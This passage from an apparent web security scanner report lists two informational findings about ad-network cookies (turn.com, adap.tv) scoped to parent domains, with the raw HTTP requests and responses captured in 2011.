Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C6%7C9%7C4%7C1002%7C6%7C1%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15104%7C15105%7C15104%7C15105%7C15104%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775; adImpCount=oZ2RNEVNFLw1rkIl8X-P-yLlEJpCYSMxdqNq6lvFdNFh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MB0Y7JvKfSWNYnBltaP_EmvZ3jqED7k2YniAtZPVqfFWyqMSMg2wplko20za_zfIcXaDNf6CpNnts8TY8puNrbeBKdSjyOjws--qAHMHtbI6SyKBbydkRUpjuoBRWw9N2QWlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYexXtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSurscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLNnm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib_dL8EW6T8qzMgGN-UfAL4hvOC7fCrKQjypg3ZZDmIIRdMbH4VAaTP3yeuIT8bUYpjNxWhaps5334qiA6przrOBR9dy7mebSJ94duif8USNC67lakY1-Wx08qAAHUQtknHQ7xnjMvY9ljRz8Oso1hdOAl8yAkjzMu60avymcp27zhmAaygIZH6vh6o5wNjgjNdonijTulYljYeiITtnJ-obiQEWW_mIpBZLcLt_p7SN9vijLbJjf63yiGSwbKyG2dGugnhWf2jLB_cEY-73f83M-Qp-ZlRKwcQuBR1ztGiFSZj4LpSPmviro5cgHdk9eJt4MMqelir0IqM1jmPswFFzniMTjL4-dEMDP4r05gYjUzZycDMwIM-JRZdaXayxbU-AwRV7xlAm5ebgZQKvg7WfQ1UAcQ-GE71_vlGriBwl0yRDK3jK3JAuWDuOfs2KJrs13LhVuZ9GXfqJdAYatFTpdnV7arjamYRVy18OpW4nYo4YOSWlJdDfSV-fwq8HgeaN-3cp1FzgjDVOVLZ2VhYwL507hxRulwL5vm7cb7KsO1XFt8hxAzJqAYOCL7WjL0qxTgxm3fdOYdOttFZUxr5r0A9mv0F_QBoXzpi8rJ_c6DrDzy9pG89s1Q06scIKHZgyDJezpNhgVkSmU0kpar5BAJuG6G30x3tmAb2j7nSNJ4ut2MaV0ROqJMzw9NFFerOKSq0jn7Z8ml_Aq0G6qyi-_p_3NfTE1kiDIdgNbUC9syknt2eSBNZW0WI7HO06yZy2SvSB5gCfomHd71CeO9uXWDgvZffEe1VrTUdxOH4gfGVkOqzE_jRzdjQRhmyVCwoc_2QRp83dWLTsWWFAIqAtnczfxrFIRAQH9jWHUPud-tHjVA42UgJXi7E-Ez_fNnbIdhDyg95Mh1WycRjhJXv8ATRtHD8vb9Vg5SwvqNhrNZsvJnUfvCegfWPkjFXygnPnoVxBMRnVTY50l5bdMYetqdZbuYYw5z5lUxbXkdIEwU2hncdLYoeK7ANErfukyrvNB8AfsR6D54cbJAyko95iDfbO-X1OEuSdYaVrz3olMX3vxG0LpmKD-Soh53aYJpCPcsWWbSJo-8gq8nYPQ6ByEPHScXR_eqXeoOaqn2ootB5duWe6vOtfx6TZyGJGsbGD1xkmmTSZiXiOf1UbISqo; fc=Son_Yybuxp_4VLqW1c6IRgpgpID-Wq7vfB3O6HP3oULbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOyzAmjEmfIrmEjGls5nEu5ZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; pf=VuSdOqHBBMMWoIrvMn_lMP-eLv8nBibtrh2G8vjmtdsh8DjSlN9aC82olgy91sxHfR8HsN28iFo6HdZJoYg638wOOBBuwSDcinuc09qjksp0U_b-1nMI4TNTMGgzSCi8Z_hcfr_LjPBbXWGr-7VM9h8ALQwqWImyohuBQ27Y8Xw0cbFZZKJtQQndzE8GAKdmqCjC1Wmwdc7KyhZThEI6g8GR1G8u2_QHuqkmg4cRHp75P-oeEBUVDf5VwU9xuwcSHhDFJb2XUqEkLs7Domz_q3w_15kKm0BgK3JfnZEKs8fymw6sA4DbktT-nyiWCSpzKjDia36pxc3U4tO78q_HETEnlSA2STvxexbY71jYrbn4WfHJhGxsiIx-9I1zygek7Pf4A_sSnTuIap-4wUTplqXPpupoZ2aAs6pg_7GbeM0kYG_OQnZuGm01WR15o5NPoS1LMOxRBcktX-fjO0PajgmdjeQBgubJJsY05jsV2l9NZFR3RH9LciXYxcTjJepHfLuMsKI6owruPhF3gPtvzLZ9utGbxF13SV_uKAl4HKsBjKyxKk2G3uw_IYoHmbxATRKbLxavAe3UnLjo4PmSoYSZ7iWo8G3Uu8TuFRx5fRaquBZLTyYvv3Ocb-7--J-VtemUKW9z2kPibwP3gpIns6cCJlO7-0c-0RDCVEYnDUx1i2LElPrZXgQ5Byxk5xNmzexDfMU0BdXw9_SkVC-SNLPKk0ap-tAMXcPQnUmauymyXWJrQVUJgzNmFh7ksHv8OiCkGDhtnY3d1dmbv-udxKiDQTuAB18iFba0UGQ3JYe5Hmk4ucjwm6TjB_9nil97jekIjc-C8BS-uf96oebtAJsE9VJeaYcwjgb-01TibpxqYVdIDX7t5imD4mPAVzRantfh3RXY5XPyQCFOvjBuvXa7BG0yK1vm2RoZoMQreNJPS7GobV7I1cjjbuZswrRZ8pR06vJUoctQlrIJHdmY0phHtKP0mry4AwYHuhrHwtX0hRtaylr7YhxxdojmJl3YDZfqAfbohofv2ZcpScTu7Mv1IaFGZ4TJyXyc3GA7cL-6MReM3fg-Tj3A4SJdGFfIYrH1TzHu0JALHFm29Lz18bNTc21I0stlz_0W7pAuJ_HPjicCNrlo8DjF_CF9jI3kgrT0QZ53DFCYuonDAxoqp153GKXwrRX9BLEvde6VV8zIDZwhAfybaduI4Tjh2o_ApS_PmBayZLHGouKushfucVUk7wDNGMmzj4GVEEX8f-rUMF1anLVD4v4W2G3qart9v0lUhUFtrwAgKmwYbDU6hcnQfk1tudLUowDkoLCasxWjkPLeTOwQyYfFRoGQ1P2wq9MRvhbae96eQc_QL8Y8Frg5X12BeQO3OjFTV291KS2RaPVPOOkGi1geUIVZG9OQnob9Bt0DOsV3G_HCir3Yg1skhTvQ4n3K65vFpt3xYbzFf8Q06hm-RooLiXjgmMQu3eHeZC5CTGrXgCx3rgAsBIoW_gNcvGPrpcTHNsQQMEhxzL-4TqRY8qS_hbJfkUANyjVcq-NSNhuTjXqndliQHUkRx6kaJj4rOszghpKbXwU

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:34 GMT; Path=/
Set-Cookie: pf=WDvFewANz5aN8ro--w_16OWau98iyOvVBtELDm2CHBX3Y07UZZPNWkK0EEUc7vAIfR8HsN28iFo6HdZJoYg637PetD2cA8xvvUoLcxur2sY9fHKHYMFFN8lXedjo-9PSl7cxfV18_Sz5Ng8ld_X1HRD_Z0wavqycrsQiFm9QZ_cEiXIeYRMvKu7l5KMvI7vm5dIdkRDTWQbgsHbEqQ37nNUVLZ0Aao2DGLgHCvs2_7zryFKliROAgCua8ygDf1pakle_qtze5tuAztFdGBKVECTB7Xzn-K67XFaryRa1HZxI2I4ae6CgiuH5tIIfNklQtPVt9L7Re7DJQWcHmwQpjCrTXh7XKumV-55sx735V56Jk4XT225c3_swkSHYmMoPRdlNOnviq7ipDvEZZ28_V5Fbphl8v0SeqcE1X29Q-XyrU8sC-NXPyqnKzoVqupwvxUtMxmzso7-ONZHGiWUGKIB5A9jubvG7JBvQXHiT1KdKWNG3ES2yEoYLCL7aUl8asmh83Bb_ySNRje2rNa0JxJcm9v4jeIQaPDoq3ACAJUl7IbOZHAHBMdmXe3UBRvsYdSrxi9Ecxa8kZThzZO6aeaas-roJj2Q-EkNpkXZbbvVeMLxvS4wRCkwyiayF00GI87TrIFafDjcHfusIoBCt22M89fvyKULVFnbtZFl9IUsQMSIRccJ6LX18XE1Nig_UUM1LGzqpcEk-rCFc1h0gpIm4Jd_QzLPdPOtdCEBAr8-8Upa6arFOpzab1pE0nDFPJkwT2KZhbD0CfG9KxUTYwAFaSuXROCWsvv1Xz_lvc5qDt8mPl3WKPA4r9Z1gJfOmbqLNFcfz6PEd-FrnEa4vrIqD8lkDUeWN7s4a9OueTLFISSSIDOlXxHejUMi7IABVrusAKookKb0pVS3987apnl6V-rQ-B6QHbtXcTAYqkWjgVeaX3klJElZGLoYa-ZuDh0Rayp3OOR_oU3ir4FomV_sy9RDK5uLzRDwQH4f7LIcJgVM65M6j7w5NDkyKKdRFf9BQS5tHIpXFtO5hdEHLwCf--aHQI9IDIlxI42NaIlUstjD2A4WMWerhztm-_a52YMN7bn25_9xS91STZcx-i0-bRhoYC7RhcSIMsIQ7o0TqwXhB0ipLjKZAXfISS2P-JyYO4jfdwozjhGCHarNmQ5BqLyG2YANF-FI5msFkFMG8UVACbcQT2qm5FtDkcuLLHIdQZhTfGyFVeET5DlWfImOBriO51iBaS4__ZMz5kSB3HnuOE2bKY8AnlZVaxKnjE3wXoM7fzLRqnlHVUJnantU17q7RnOwBeHgICWJsFQhc5wErZcKgnhVskq0bqyxhv_wjCGmN2gxKw0dhDnPYP_0Mmfi4j9yfMUwSdI9Lj7zJoKt8QnzKrSSc_RuX7K1PHnQtlNj8JmeKpHFW1PRfTb0fyYghIq-IITFkYc_uI9YSpJVpN2FNg5u_cdS3RjPCyL40JPKaH3V39NisQu1y367wTC7MmfceuL1HdWZa_yTHCCN0MTXDwR0tX3R7CB1nx3sRNCxKgOOP_38C_7cJoCDagfHqnmufnkMRoDa8dwQ; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:34 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:39:34 GMT

GIF89a.............!.......,...........D..;

13.81. http://r.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:40 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C6%7C9%7C4%7C1002%7C6%7C1%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15104%7C15105%7C15104%7C15105%7C15104%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775; adImpCount=oZ2RNEVNFLw1rkIl8X-P-yLlEJpCYSMxdqNq6lvFdNFh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MB0Y7JvKfSWNYnBltaP_EmvZ3jqED7k2YniAtZPVqfFWyqMSMg2wplko20za_zfIcXaDNf6CpNnts8TY8puNrbeBKdSjyOjws--qAHMHtbI6SyKBbydkRUpjuoBRWw9N2QWlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYexXtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSurscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLNnm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib_dL8EW6T8qzMgGN-UfAL4hvOC7fCrKQjypg3ZZDmIIRdMbH4VAaTP3yeuIT8bUYpjNxWhaps5334qiA6przrOBR9dy7mebSJ94duif8USNC67lakY1-Wx08qAAHUQtknHQ7xnjMvY9ljRz8Oso1hdOAl8yAkjzMu60avymcp27zhmAaygIZH6vh6o5wNjgjNdonijTulYljYeiITtnJ-obiQEWW_mIpBZLcLt_p7SN9vijLbJjf63yiGSwbKyG2dGugnhWf2jLB_cEY-73f83M-Qp-ZlRKwcQuBR1ztGiFSZj4LpSPmviro5cgHdk9eJt4MMqelir0IqM1jmPswFFzniMTjL4-dEMDP4r05gYjUzZycDMwIM-JRZdaXayxbU-AwRV7xlAm5ebgZQKvg7WfQ1UAcQ-GE71_vlGriBwl0yRDK3jK3JAuWDuOfs2KJrs13LhVuZ9GXfqJdAYatFTpdnV7arjamYRVy18OpW4nYo4YOSWlJdDfSV-fwq8HgeaN-3cp1FzgjDVOVLZ2VhYwL507hxRulwL5vm7cb7KsO1XFt8hxAzJqAYOCL7WjL0qxTgxm3fdOYdOttFZUxr5r0A9mv0F_QBoXzpi8rJ_c6DrDzy9pG89s1Q06scIKHZgyDJezpNhgVkSmU0kpar5BAJuG6G30x3tmAb2j7nSNJ4ut2MaV0ROqJMzw9NFFerOKSq0jn7Z8ml_Aq0G6qyi-_p_3NfTE1kiDIdgNbUC9syknt2eSBNZW0WI7HO06yZy2SvSB5gCfomHd71CeO9uXWDgvZffEe1VrTUdxOH4gfGVkOqzE_jRzdjQRhmyVCwoc_2QRp83dWLTsWWFAIqAtnczfxrFIRAQH9jWHUPud-tHjVA42UgJXi7E-Ez_fNnbIdhDyg95Mh1WycRjhJXv8ATRtHD8vb9Vg5SwvqNhrNZsvJnUfvCegfWPkjFXygnPnoVxBMRnVTY50l5bdMYetqdZbuYYw5z5lUxbXkdIEwU2hncdLYoeK7ANErfukyrvNB8AfsR6D54cbJAyko95iDfbO-X1OEuSdYaVrz3olMX3vxG0LpmKD-Soh53aYJpCPcsWWbSJo-8gq8nYPQ6ByEPHScXR_eqXeoOaqn2ootB5duWe6vOtfx6TZyGJGsbGD1xkmmTSZiXiOf1UbISqo; fc=Son_Yybuxp_4VLqW1c6IRgpgpID-Wq7vfB3O6HP3oULbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOyzAmjEmfIrmEjGls5nEu5ZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; pf=VuSdOqHBBMMWoIrvMn_lMP-eLv8nBibtrh2G8vjmtdsh8DjSlN9aC82olgy91sxHfR8HsN28iFo6HdZJoYg638wOOBBuwSDcinuc09qjksp0U_b-1nMI4TNTMGgzSCi8Z_hcfr_LjPBbXWGr-7VM9h8ALQwqWImyohuBQ27Y8Xw0cbFZZKJtQQndzE8GAKdmqCjC1Wmwdc7KyhZThEI6g8GR1G8u2_QHuqkmg4cRHp75P-oeEBUVDf5VwU9xuwcSHhDFJb2XUqEkLs7Domz_q3w_15kKm0BgK3JfnZEKs8fymw6sA4DbktT-nyiWCSpzKjDia36pxc3U4tO78q_HETEnlSA2STvxexbY71jYrbn4WfHJhGxsiIx-9I1zygek7Pf4A_sSnTuIap-4wUTplqXPpupoZ2aAs6pg_7GbeM0kYG_OQnZuGm01WR15o5NPoS1LMOxRBcktX-fjO0PajgmdjeQBgubJJsY05jsV2l9NZFR3RH9LciXYxcTjJepHfLuMsKI6owruPhF3gPtvzLZ9utGbxF13SV_uKAl4HKsBjKyxKk2G3uw_IYoHmbxATRKbLxavAe3UnLjo4PmSoYSZ7iWo8G3Uu8TuFRx5fRaquBZLTyYvv3Ocb-7--J-VtemUKW9z2kPibwP3gpIns6cCJlO7-0c-0RDCVEYnDUx1i2LElPrZXgQ5Byxk5xNmzexDfMU0BdXw9_SkVC-SNLPKk0ap-tAMXcPQnUmauymyXWJrQVUJgzNmFh7ksHv8OiCkGDhtnY3d1dmbv-udxKiDQTuAB18iFba0UGQ3JYe5Hmk4ucjwm6TjB_9nil97jekIjc-C8BS-uf96oebtAJsE9VJeaYcwjgb-01TibpxqYVdIDX7t5imD4mPAVzRantfh3RXY5XPyQCFOvjBuvXa7BG0yK1vm2RoZoMQreNJPS7GobV7I1cjjbuZswrRZ8pR06vJUoctQlrIJHdmY0phHtKP0mry4AwYHuhrHwtX0hRtaylr7YhxxdojmJl3YDZfqAfbohofv2ZcpScTu7Mv1IaFGZ4TJyXyc3GA7cL-6MReM3fg-Tj3A4SJdGFfIYrH1TzHu0JALHFm29Lz18bNTc21I0stlz_0W7pAuJ_HPjicCNrlo8DjF_CF9jI3kgrT0QZ53DFCYuonDAxoqp153GKXwrRX9BLEvde6VV8zIDZwhAfybaduI4Tjh2o_ApS_PmBayZLHGouKushfucVUk7wDNGMmzj4GVEEX8f-rUMF1anLVD4v4W2G3qart9v0lUhUFtrwAgKmwYbDU6hcnQfk1tudLUowDkoLCasxWjkPLeTOwQyYfFRoGQ1P2wq9MRvhbae96eQc_QL8Y8Frg5X12BeQO3OjFTV291KS2RaPVPOOkGi1geUIVZG9OQnob9Bt0DOsV3G_HCir3Yg1skhTvQ4n3K65vFpt3xYbzFf8Q06hm-RooLiXjgmMQu3eHeZC5CTGrXgCx3rgAsBIoW_gNcvGPrpcTHNsQQMEhxzL-4TqRY8qS_hbJfkUANyjVcq-NSNhuTjXqndliQHUkRx6kaJj4rOszghpKbXwU

Response

13.82. http://segments.adap.tv/data/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segments.adap.tv
Path:	/data/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

adaptv_unique_user_cookie="3547400152957574101__TIME__2011-05-12+04%3A39%3A28";Path=/;Domain=.adap.tv;Expires=Sun, 18-Jan-2043 13:26:08 GMT
audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1305874800,\"e\":1305874800,\"s\":[],\"a\":[]},\"9\":{\"f\":1307775600,\"e\":1307775600,\"s\":[528],\"a\":[]},\"8\":{\"f\":1307602800,\"e\":1307602800,\"s\":[1785],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Sun, 18-Jan-2043 13:26:08 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/?p=cadreon&type=gif&segment=11&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
